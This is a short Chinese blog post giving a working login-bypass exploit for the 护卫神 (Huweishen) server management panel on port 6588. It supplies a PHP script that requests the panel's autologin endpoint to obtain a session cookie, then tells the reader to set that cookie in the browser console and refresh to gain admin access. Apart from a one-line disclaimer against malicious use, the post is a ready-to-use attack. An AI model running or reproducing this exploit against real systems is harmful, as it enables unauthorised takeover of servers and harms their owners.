护卫神6588端口绕过登录漏洞

前言

1.请勿恶意攻击任何站点

2.有上传文件权限

步骤

根目录新建cookie.php文件引入代码

<?phpfunction httpGet() { $url = ’域名+:6588/admin/index.asp?f=autologin’;//请填写域名+:6588/admin/index.asp?f=autologin $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_TIMEOUT, 120); $result = curl_exec($ch); return $result;}echo httpGet();?>

利用浏览器F12审查元素中的Console功能引入代码

document.cookie=cookie.php中获取的cookie值

刷新即可进入

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论